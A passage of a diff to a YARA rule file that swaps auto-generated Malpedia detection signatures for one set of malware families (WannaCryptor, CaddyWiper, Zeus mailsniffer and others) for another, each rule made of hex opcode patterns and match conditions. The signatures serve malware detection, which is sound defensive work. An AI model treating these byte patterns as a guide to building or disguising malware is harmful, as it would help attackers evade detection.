"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bohmini_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "cbf2ea9a6bca6a983b840d14cd3e4818a640e713858e86101c3fa57dacf19221" + logic_hash = "924ffc111e8f5edb5600c44b643235932f72ba9b2a992fa2571ad4dc6b3c6eb8" score = 75 quality = 75 tags = "FILE" @@ -153744,34 +156527,34 @@ rule MALPEDIA_Win_Kuaibu8_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 e8???????? 83c404 58 8945e4 8b5ddc } - $sequence_1 = { 895dc8 6a00 6a00 6a00 6804000080 } - $sequence_2 = { 52 e8???????? 83c404 8d0c2f 8bf0 8b03 } - $sequence_3 = { e9???????? 8b5dec e8???????? 8945d8 837dd803 0f8586010000 } - $sequence_4 = { ff75f4 e8???????? 83c408 83f800 0f8521000000 8b45fc 85c0 } - $sequence_5 = { 81ec30000000 c745fc00000000 8965f8 8b5d08 ff33 ff15???????? 90 } - $sequence_6 = { e8???????? 8945d4 8b5ddc 85db 7409 } - $sequence_7 = { 53 e8???????? 83c404 58 8945f4 6805000000 e8???????? } - $sequence_8 = { dd5de8 dd45e8 dc25???????? dd5de0 8b5df8 e8???????? b802000000 } - $sequence_9 = { 83c404 8803 e9???????? bd02000000 55 e8???????? 668b4e0c } + $sequence_0 = { 896c2410 896c2414 0f86c5000000 8b7c2420 } + $sequence_1 = { 6a00 6a00 8bca 83c11a 51 6a00 6a00 } + $sequence_2 = { 8d542414 6a00 52 ff15???????? 85c0 } + $sequence_3 = { ff15???????? 3bc3 a3???????? 7512 5f 5e } + $sequence_4 = { 6800040000 50 53 ff15???????? 50 ff15???????? } + $sequence_5 = { 4a 741a 4a 7543 e8???????? 03c6 33d2 } + $sequence_6 = { 83c410 85c0 7507 6891130000 eb2a } + $sequence_7 = { 8b5608 52 ffd5 40 50 } + $sequence_8 = { 52 e8???????? 40 50 8d8424b8010000 50 } + $sequence_9 = { 8b2d???????? 8b3e 51 6a00 ffd5 50 ffd3 } condition: - 7 of them and filesize <737280 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Rising_Sun_Auto : FILE +rule MALPEDIA_Win_Coreshell_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "61449700-41c3-5e72-bc5d-1e423597afa4" + id = "f8b1ab7a-5e3f-5f01-8787-4d480849e1bc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rising_sun_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coreshell_auto.yar#L1-L424" license_url = "N/A" - logic_hash = "76c0e1eaf3dacaaaa1a31e893606959ffd6d8a46f21e1d7c2864ee68d388c2cb" + logic_hash = "23addbe4ab3205859c50e41702fa9e9c554a336132b182d2582fda2f9387a324" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -153783,32 +156566,70 @@ rule MALPEDIA_Win_Rising_Sun_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745b03414d384 c745b418f4ff64 c745b851d4c644 c745bcabb43c24 c745c099945804 c745c4c4746ce4 c745c8dd544ec4 } - $sequence_1 = { 4889742418 48897c2420 55 488dac24a0e4ffff b8601c0000 } - $sequence_2 = { c745dcd3515290 c745e00358c000 c745e4c80ae51e c745e804d34ed7 c745ec3e3054ad c745f046c2e664 c745f418a189fe } - $sequence_3 = { c785100200000358c000 c78514020000c80ae51e c7851802000004d34ed7 c7851c0200003e3054ad c7852002000046c2e664 } - $sequence_4 = { e8???????? 48898588000000 488d05c298feff 4883c420 } - $sequence_5 = { c78514020000c80ae51e c7851802000004d34ed7 c7851c0200003e3054ad c7852002000046c2e664 c7852402000018a189fe c7852802000003f29cea c7852c0200000bbce179 } - $sequence_6 = { c785440600001def57f7 c785480600003bf5679d c7854c0600000989ec8d c78550060000fd9e1cf3 66c785540600002657 664489ad60060000 e8???????? } - $sequence_7 = { 4c8d41ff 488bce e8???????? 488b542450 b89fffffff } - $sequence_8 = { 660f1f440000 0fb602 48ffc2 88440aff 84c0 75f2 } - $sequence_9 = { e8???????? cc 48895c2408 48896c2418 56 57 4154 } + $sequence_0 = { 68???????? 52 ffd7 ffd0 } + $sequence_1 = { 56 6810270000 ff15???????? be06000000 e8???????? 85c0 7401 } + $sequence_2 = { 56 ff15???????? 83c40c 3bc6 } + $sequence_3 = { c20400 50 a1???????? 6a00 } + $sequence_4 = { 8b15???????? 6a01 51 68???????? 52 } + $sequence_5 = { 50 57 6a08 51 ff15???????? 8bf8 85ff } + $sequence_6 = { 50 ff15???????? 83c404 32db } + $sequence_7 = { 56 6a00 6a00 681c800000 6a00 } + $sequence_8 = { 6a00 6a00 ff15???????? 8bf0 ff15???????? 50 } + $sequence_9 = { 6804010000 6a08 8b15???????? 52 ff15???????? } + $sequence_10 = { 8d4c2400 56 51 6a00 } + $sequence_11 = { 85c0 7402 eb14 c745f000000000 68e0930400 } + $sequence_12 = { 68???????? 50 a3???????? ffd6 a3???????? a1???????? } + $sequence_13 = { 8bf1 8b4604 85c0 7407 50 ff15???????? 8b36 } + $sequence_14 = { ff15???????? ffd0 85c0 7508 ff15???????? } + $sequence_15 = { 68???????? 6800080000 8d85fcefffff 50 ff15???????? } + $sequence_16 = { 68???????? 50 ffd6 6a00 6a00 6a00 } + $sequence_17 = { 51 56 8d442404 6a00 8bf1 50 } + $sequence_18 = { 51 8b0d???????? 52 50 57 68???????? 51 } + $sequence_19 = { 81e1ffff0000 81e1ffff0000 81e1ff000000 81e1ff000000 } + $sequence_20 = { 8d55f0 52 e8???????? 83c408 33c0 8b4df0 64890d00000000 } + $sequence_21 = { ff15???????? 50 68???????? 68???????? 8985f0fdffff 8d85f4fdffff 6804010000 } + $sequence_22 = { 85ed 7476 85ff 7516 8b5c241c 8b0d???????? 53 } + $sequence_23 = { 8b15???????? 57 6a00 52 ff15???????? 8b0d???????? 8bf0 } + $sequence_24 = { 8985f0fdffff 8d85f4fdffff 6804010000 50 ff15???????? 83c414 } + $sequence_25 = { c1e908 81e1ff000000 0fb6d1 52 } + $sequence_26 = { 8b8dd8edffff 51 8d95f4edffff 52 68???????? } + $sequence_27 = { 81e2ffff0000 81e2ffff0000 c1ea08 81e2ff000000 } + $sequence_28 = { 83c414 8d8df4fdffff 51 ff15???????? } + $sequence_29 = { 50 68???????? 8b0d???????? 51 ff15???????? ffd0 } + $sequence_30 = { 6888130000 ff15???????? c745f000000000 c745f400000000 } + $sequence_31 = { 56 51 56 6a01 } + $sequence_32 = { 8be8 8b442410 50 e8???????? } + $sequence_33 = { 8d8dfcefffff 51 ff15???????? ba00080000 } + $sequence_34 = { 50 ff15???????? a1???????? 83c418 } + $sequence_35 = { ffd6 ffd0 68???????? a3???????? } + $sequence_36 = { 57 8b3d???????? 68???????? ffd7 8b35???????? 68???????? 50 } + $sequence_37 = { 8908 813800000000 0f94c2 8b35???????? 8b3d???????? 0faff6 81c601000000 } + $sequence_38 = { 8908 813800000000 0f95c2 8b35???????? } + $sequence_39 = { a3???????? ffd7 8bd8 68???????? 53 } + $sequence_40 = { 53 a3???????? ffd6 68???????? a3???????? } + $sequence_41 = { 5f 5d c3 89e0 c70010270000 } + $sequence_42 = { 5f 5b 5d c3 b81c000000 } + $sequence_43 = { 8908 8b15???????? 89d6 81c609000000 } + $sequence_44 = { bf04010000 57 6a08 ff35???????? ff15???????? } + $sequence_45 = { 29d6 01f0 a3???????? e9???????? } + $sequence_46 = { 8908 8b00 8b5004 8b35???????? } + $sequence_47 = { 29d6 0faff0 31d2 f7f6 } condition: - 7 of them and filesize <409600 + 7 of them and filesize <303100 } -rule MALPEDIA_Win_Slickshoes_Auto : FILE +rule MALPEDIA_Win_Yorekey_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "86c839b6-e5b0-5f50-b2eb-341682181175" + id = "0c2854a9-311b-528a-8d3c-9008975025f5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slickshoes_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yorekey_auto.yar#L1-L165" license_url = "N/A" - logic_hash = "a30adc8e9bcf8ed13fec8919d0e4389d7fc505e3cf19302dcab25ec63fa5bcd2" + logic_hash = "bfaa0e3abe9f69e663c8e7749df7b846bcbaa395b01b91bd4c5c56f646e51121" score = 75 quality = 75 tags = "FILE" @@ -153822,32 +156643,37 @@ rule MALPEDIA_Win_Slickshoes_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 81c204000000 55 bd2a3bff63 81e5fb17be7f e9???????? 57 } - $sequence_1 = { e9???????? f7d2 50 e9???????? b87073f77f f7d8 0d90f1fe6f } - $sequence_2 = { 81f61f000000 2d01000000 6681ebb987 81f704000000 b800020000 89fa b800000000 } - $sequence_3 = { e9???????? b804000000 01c1 58 81c104000000 e9???????? 83c404 } - $sequence_4 = { e9???????? b931bbb979 81e13b81af7f e9???????? 5a 01d1 81e91dadf56e } - $sequence_5 = { ff3424 5f 83c404 50 54 58 0504000000 } - $sequence_6 = { e9???????? bd40d86e7e 81c74b047f7d 29ef 81ef4b047f7d 5d 81f75adb6482 } - $sequence_7 = { e9???????? 81c104000000 57 52 68f987eb16 8b1424 81c404000000 } - $sequence_8 = { 89ee b80a000000 81cf40000000 2d04000000 09c7 81c302000000 01d7 } - $sequence_9 = { 8b12 81c206000000 0fb732 81f128000000 09d1 01d1 31c3 } + $sequence_0 = { 750a 85c0 7506 ff15???????? } + $sequence_1 = { 4883ec20 33ff 488d1dc9fa0000 488b0b ff15???????? } + $sequence_2 = { 33c9 ff15???????? 488bd8 ff15???????? 3db7000000 7509 } + $sequence_3 = { 8bc6 83f801 7521 a1???????? 50 ff15???????? 68???????? } + $sequence_4 = { 03048de0404100 eb02 8bc2 f6402480 0f8571ffffff 33f6 3bfe } + $sequence_5 = { 4803d1 488d0d02090100 442bc6 488b0cc1 498b0c0c ff15???????? 85c0 } + $sequence_6 = { 7530 a1???????? ba???????? 50 e9???????? a1???????? } + $sequence_7 = { 488bce e8???????? 488d154c040100 4c63c8 418d4902 } + $sequence_8 = { 730d 488bd3 488bcf e8???????? eb1c } + $sequence_9 = { 751b 6a02 33c9 51 } + $sequence_10 = { 7405 6641894d00 4885f6 7457 483bf7 7252 4d85ff } + $sequence_11 = { 898570ffffff 89856cffffff 8d4598 b919000000 } + $sequence_12 = { ff15???????? 488d44243c 448d4f04 4889442428 4c8d05cbfaffff } + $sequence_13 = { 5a 8985c4fbffff 3bc2 0f8451ffffff 83f807 0f87110a0000 ff2485b19b4000 } + $sequence_14 = { 55 8bec 51 8bc2 56 8d7002 8d9b00000000 } condition: - 7 of them and filesize <11198464 + 7 of them and filesize <274432 } -rule MALPEDIA_Win_Wannacryptor_Auto : FILE +rule MALPEDIA_Win_Findpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e56d2000-fe42-59bd-8926-478b3a54b7b3" + id = "06e6ab2e-1688-507b-a649-5420f969f64c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wannacryptor_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.findpos_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "c696b2074a3cd60e9575143d9577c550babed6e9c2f46c424c5b90d1a1647723" + logic_hash = "89f2603a026fe078dffd243a5f02eea72ee3cfa2b2eca87062e133a5a2b51b38" score = 75 quality = 75 tags = "FILE" @@ -153861,32 +156687,32 @@ rule MALPEDIA_Win_Wannacryptor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 8bf1 57 8b7c241c 8b4670 } - $sequence_1 = { 8854243c 8b44243c 50 51 8bce } - $sequence_2 = { b801000000 33ff 85c0 7e76 8bd8 8b5500 03cf } - $sequence_3 = { 8bce e8???????? 8a4649 84c0 7419 8b4620 } - $sequence_4 = { ff15???????? 50 e8???????? 85c0 742e 8b4004 8d542404 } - $sequence_5 = { 8b4674 c6464801 85c0 7509 6a00 } - $sequence_6 = { 50 ff15???????? 50 e8???????? 8b4820 6a00 6a00 } - $sequence_7 = { 8b4678 8d7e44 85c0 755f 8b17 } - $sequence_8 = { e8???????? 8d4648 8d4c2410 50 c744243000000000 } - $sequence_9 = { 57 8b7c241c 8b4670 85c0 7503 } + $sequence_0 = { 48 0f844b050000 33c0 8d8c24f0010000 50 51 8d8c243c020000 } + $sequence_1 = { 68???????? e8???????? a1???????? 59 59 83c010 a3???????? } + $sequence_2 = { 7671 8365d400 8d55d4 8bcf } + $sequence_3 = { 8bcf e8???????? 8325????????00 833d????????10 68???????? 0f4335???????? } + $sequence_4 = { 8b0cb8 03cb e8???????? 85c0 7414 8b4df0 } + $sequence_5 = { eb29 8a01 3c33 7505 } + $sequence_6 = { 8945f8 8d45f8 50 c745ec00200000 ff15???????? 85c0 745f } + $sequence_7 = { 3b08 7518 53 51 51 6a01 8d45e4 } + $sequence_8 = { 50 0fb6c1 50 8d85e8e7ffff 50 } + $sequence_9 = { 33f6 46 3bc6 0f8577040000 6a11 ffd7 663bc6 } condition: - 7 of them and filesize <540672 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Joao_Auto : FILE +rule MALPEDIA_Win_Tempedreve_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d37cc5ea-3d73-5336-a732-17564803dcb9" + id = "e62cef01-6d44-587e-a3de-2c290fdad6d7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.joao_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tempedreve_auto.yar#L1-L163" license_url = "N/A" - logic_hash = "86dd7ba6af2ece0f6d3df07328920c1e2520bb8d3e325d921ed8a0a42914959d" + logic_hash = "5e6b4c6e2f4e0f76996895055b92463fa9cea8a31f828bb15d4eb02a56497fa3" score = 75 quality = 75 tags = "FILE" @@ -153900,32 +156726,38 @@ rule MALPEDIA_Win_Joao_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bce 897dfc e8???????? 837de810 c745fcffffffff 720c 8b45d4 } - $sequence_1 = { 8b4e08 2b0e c1f905 3bc8 } - $sequence_2 = { 8d4dd0 51 8bce 897dfc e8???????? } - $sequence_3 = { 50 6a0f 68???????? e8???????? 8b5510 8d8df8feffff } - $sequence_4 = { 8b4804 8b4c3138 c645ef01 4b } - $sequence_5 = { 8d45f8 50 8bce c745f809000000 897dfc e8???????? 8d4df8 } - $sequence_6 = { e8???????? 8b4604 83e7e0 033e } - $sequence_7 = { 8b4c3224 8b443220 c645fc03 85c9 7c15 7f04 } - $sequence_8 = { 8d4dd4 e8???????? 8d4dd0 51 8bce 897dfc e8???????? } - $sequence_9 = { 8b4e08 2b0e c1f905 3bc8 736a 8d7e0c 50 } + $sequence_0 = { 011e 015e10 015e0c 0fb75706 } + $sequence_1 = { 011a 8b87dc000000 83c204 03c6 } + $sequence_2 = { 01042f 034c2ff8 8d45ec 894c2ff8 } + $sequence_3 = { 754f 85f6 744b 214524 8d4520 } + $sequence_4 = { 011a 45 8d14a9 8b02 } + $sequence_5 = { 0103 a1???????? 83c004 50 ff15???????? } + $sequence_6 = { 0104b7 8b8424a8000000 83c704 4d } + $sequence_7 = { 010f 8b07 83c704 3bc1 } + $sequence_8 = { 89542430 eb09 83f801 0f86c8010000 0fb64500 0fb64d01 } + $sequence_9 = { 85c0 0f85a9090000 53 8916 8d4e04 } + $sequence_10 = { 8bc8 c1e903 8d440140 c20400 } + $sequence_11 = { 899e1c040000 895c2458 3bc3 0f86eb070000 8d9b00000000 8b44245c 85c0 } + $sequence_12 = { 55 51 8bce 8d5c0301 e8???????? 3bd8 8b5c2458 } + $sequence_13 = { 72f3 8b4c2414 8b6c2428 3bda 0f84e1000000 } + $sequence_14 = { 8b6c2410 8bd3 2bd7 52 55 8bce e8???????? } + $sequence_15 = { 8b542430 3bda 7320 8d4d02 8be8 2b6c2428 } condition: - 7 of them and filesize <2867200 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Caddywiper_Auto : FILE +rule MALPEDIA_Win_Typehash_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "24926b93-f761-5ed3-a63e-3417e035ba52" + id = "edf296ed-fbc4-5bd8-b180-ef55e989c944" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.caddywiper_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.typehash_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "79a75ac7d216323abd7ca177a49671b9ea50088d3b0d895d69cfd4d03ce4d9ea" + logic_hash = "9451e6a97a0b537ea280e22049617c90fd5aa93257a4b129bfda6427a2eb4eeb" score = 75 quality = 75 tags = "FILE" @@ -153939,32 +156771,32 @@ rule MALPEDIA_Win_Caddywiper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8345b404 66837dac00 75c4 c745a800000000 } - $sequence_1 = { c68592feffff64 c68593feffff00 c68594feffff76 c68595feffff00 c68596feffff61 c68597feffff00 } - $sequence_2 = { 51 e8???????? 83c408 8985b0fbffff c785f4f1ffff00000000 c68588fbffff4c } - $sequence_3 = { e9???????? 6a00 8b95acf1ffff 52 ff9564f7ffff } - $sequence_4 = { 8b4dfc 8b5508 c7048a00000000 ebd7 } - $sequence_5 = { c645b900 c645ba39 c645bb00 c645bc00 c645bd00 8d4d98 898df4f7ffff } - $sequence_6 = { c685a3feffff00 c685a4feffff6c c685a5feffff00 c685a6feffff6c c685a7feffff00 } - $sequence_7 = { c6459264 c6459300 8d458c 50 8d8d90feffff } - $sequence_8 = { 8985fcf7ffff 8d55c0 52 8d45dc } - $sequence_9 = { 7407 8b4598 50 ff55fc 8b4594 8be5 } + $sequence_0 = { 83e11f 8b0485e03d4100 8d04c8 eb05 b8???????? f6400420 740d } + $sequence_1 = { c3 8bc8 83e01f c1f905 8b0c8de03d4100 8a44c104 } + $sequence_2 = { e8???????? 6a01 8d4c2450 c68424cc00000001 e8???????? bf???????? } + $sequence_3 = { 8944240c c744241004000000 7460 8b2d???????? 8b3d???????? } + $sequence_4 = { c1f805 c1e603 8d1c85e03d4100 8b0485e03d4100 03c6 8a5004 } + $sequence_5 = { 50 51 6813000020 56 c744242000000000 c744242404000000 ffd7 } + $sequence_6 = { 03c8 3bc1 7d1e 8d1440 2bc8 8d1495e8294100 832200 } + $sequence_7 = { 3bf3 7505 be???????? 8b54242c 8b442430 8bcf 55 } + $sequence_8 = { 837d1805 7538 837d1000 7508 8bb6b42b4100 } + $sequence_9 = { e8???????? 68???????? 8d45c8 c745c8e4e74000 50 } condition: - 7 of them and filesize <33792 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Pgift_Auto : FILE +rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "77b72e7a-f170-5cb6-9a32-dd868251e29f" + id = "4733ffb9-de21-5ee6-bd3e-4039874823ba" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pgift_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_mailsniffer_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "5fec76c05b43d836fa9681344d4e2173c2fdd272e3aa573e02794115bc07ca47" + logic_hash = "43d5df07bea6317ea4eb20e7781c6702e7589e518cedd0ad1502aceef73d3213" score = 75 quality = 75 tags = "FILE" @@ -153978,32 +156810,32 @@ rule MALPEDIA_Win_Pgift_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 ff7508 e8???????? 83450804 83c304 } - $sequence_1 = { 2bc8 c1f902 7454 50 8d4de8 } - $sequence_2 = { 50 0fb745d4 50 8d45ec ff760c } - $sequence_3 = { 8d4df0 c645fc02 e8???????? ff750c } - $sequence_4 = { 83f8ff 741e 53 50 8d4de8 e8???????? ff75e8 } - $sequence_5 = { 8d4df0 ff3498 e8???????? 83f8ff } - $sequence_6 = { 33db 8d4dec 895dfc e8???????? 8d8dd0feffff 895de8 e8???????? } - $sequence_7 = { c645fc03 897e38 897e34 897e30 e8???????? 3bc7 } - $sequence_8 = { ff7634 53 50 e8???????? 83c40c 8d4638 } - $sequence_9 = { 8d4de8 e8???????? 6a5c 8d4de8 c645fc01 } + $sequence_0 = { 6a01 56 e8???????? 83c40c 85c0 7473 807b0e02 } + $sequence_1 = { 53 6880000000 6a03 53 53 68000000c0 8bc6 } + $sequence_2 = { 68???????? ff750c ff15???????? 83c40c 85c0 0f85bc000000 ffd6 } + $sequence_3 = { 0f84e2020000 53 8d4594 50 8d4588 50 c7459401000000 } + $sequence_4 = { 8b4510 0118 ff45d8 837dc800 0f8480000000 ff75f4 } + $sequence_5 = { 33f6 e8???????? 83c40c 84c0 0f843d020000 8b45f4 } + $sequence_6 = { 56 ff75fc e8???????? 83c414 8bf8 8b35???????? ff15???????? } + $sequence_7 = { 0f8c5b010000 40 3b442410 72dd e9???????? 50 } + $sequence_8 = { 74f4 6a08 8d442430 53 } + $sequence_9 = { 2bd1 eb99 55 8bec 83e4f8 81ecfc0e0000 53 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Ziyangrat_Auto : FILE +rule MALPEDIA_Win_Vskimmer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "61b87837-dc98-50eb-8916-bc6cbc20d03f" + id = "fc191c93-ce90-5418-a28d-2b3fa9eb623e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ziyangrat_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vskimmer_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "63664fb49a7b130cd77da76446f0977d6b37fb6657ee0279b7de100f4571b771" + logic_hash = "81aef2465b53cd0c0e1b48561687f8c8208fd8d87041be709dd2217d8a17703f" score = 75 quality = 75 tags = "FILE" @@ -154017,32 +156849,32 @@ rule MALPEDIA_Win_Ziyangrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89442405 89442409 668944240d 8844240f 8b11 8d442410 } - $sequence_1 = { c3 8b9c24a4000000 68???????? 53 8d4c2444 } - $sequence_2 = { c68424e200000069 888424e3000000 889c24e4000000 888c24eb000000 c68424ec00000047 c68424ed00000020 } - $sequence_3 = { b93f000000 33c0 8dbc2441010000 889c2440010000 b265 f3ab } - $sequence_4 = { 8dbd48f7ffff 83c9ff 33c0 f2ae f7d1 83c1ff 51 } - $sequence_5 = { 889c2410020000 89442461 889c2410070000 6689442465 889c2410030000 } - $sequence_6 = { 8b4c2410 56 50 51 e8???????? 68???????? 8d542420 } - $sequence_7 = { 48 0d0000ffff 40 6689442408 25ffff0000 8d1440 } - $sequence_8 = { 50 e8???????? 83c40c 85c0 752a e8???????? } - $sequence_9 = { 8b7c240c 8b04bd10894000 8d1cbd10894000 3d00100000 0f84c8000000 8b04bd20094100 56 } + $sequence_0 = { 3bc3 7402 8bf0 8bd6 f7da 8a07 } + $sequence_1 = { 68???????? 50 e8???????? 59 59 85c0 0f8445010000 } + $sequence_2 = { 33c0 0fbe84c188e54100 6a07 c1f804 59 } + $sequence_3 = { 75f8 ff36 e8???????? 59 8b4508 } + $sequence_4 = { 8b4508 8bf1 8b4d0c 8b7e04 } + $sequence_5 = { 5e 5b c3 8b94c110010000 8bb110020000 8b44c108 2bc6 } + $sequence_6 = { 3bd7 749c 8b8324020000 2580000000 0f95c0 0fb6c0 50 } + $sequence_7 = { 7e7b 8b460c ff36 03c7 50 } + $sequence_8 = { 7413 c685b3fdffff01 3bf3 7408 8b451c 8906 } + $sequence_9 = { 83e803 0f846a010000 48 7439 48 742d 8b4508 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <376832 } -rule MALPEDIA_Win_Malumpos_Auto : FILE +rule MALPEDIA_Win_Spectre_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "011d5980-db12-575d-b128-68c240971c82" + id = "af0ed3ea-7150-5006-a1e4-f1f71a7eae7a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.malumpos_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spectre_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "1d9a68f5cdfadc8f79ba4d8f4695a01ec544e2c566edbd712a7ed582b4a68976" + logic_hash = "168b0e3a3116ff3325056de927c137c412a6159d98ef56a6628c736a2a7417ad" score = 75 quality = 75 tags = "FILE" @@ -154056,71 +156888,71 @@ rule MALPEDIA_Win_Malumpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85f6 7907 0d80000000 eb27 } - $sequence_1 = { 53 50 c78500fdffff07000100 895d4c 895dcc e8???????? } - $sequence_2 = { 59 8d45cc 50 ff15???????? 6a44 } - $sequence_3 = { 0f1f00 0f1f00 0f1f00 0f1f00 6a72 } - $sequence_4 = { 3bc8 0f86f1feffff ff770c 50 e8???????? } - $sequence_5 = { 7805 0500000000 57 3500000000 } - $sequence_6 = { 8a0432 3c3d 7506 8365fc00 eb0d } - $sequence_7 = { e8???????? 68???????? a3???????? ffd0 810d????????00200000 be???????? c745f468e50300 } - $sequence_8 = { 6683f300 55 51 7204 } - $sequence_9 = { 8d4520 50 ff15???????? 8d4520 } + $sequence_0 = { ebe3 83c8ff 5d 5b 59 59 c3 } + $sequence_1 = { 68???????? ff5604 e9???????? 807c242000 0f8414010000 6a02 } + $sequence_2 = { 51 e8???????? 59 59 8b8424ec000000 895c2470 896c2474 } + $sequence_3 = { 50 e8???????? 83c40c 50 8d8424a0000000 50 e8???????? } + $sequence_4 = { 83e801 7440 83e801 742c 83e801 7418 } + $sequence_5 = { 894554 53 8d4dc3 e8???????? 8bc8 e8???????? 50 } + $sequence_6 = { 83f81b 0f8ee3020000 83f81f 0f8eb3020000 83f821 0f8e06020000 83f822 } + $sequence_7 = { 8b4704 8bcd c6400c01 8b4704 8b4004 c6400c00 8b4704 } + $sequence_8 = { 51 8d8c2440010000 e8???????? 8d8c24d8000000 e8???????? 8d4c2448 e8???????? } + $sequence_9 = { c68424c400000000 ff15???????? 59 59 85c0 743d 6a01 } condition: - 7 of them and filesize <542720 + 7 of them and filesize <990208 } -rule MALPEDIA_Win_Nimplant_Auto : FILE +rule MALPEDIA_Win_Unidentified_061_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c6b47fc0-6c54-5733-accf-0312881d8593" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimplant_auto.yar#L1-L133" + id = 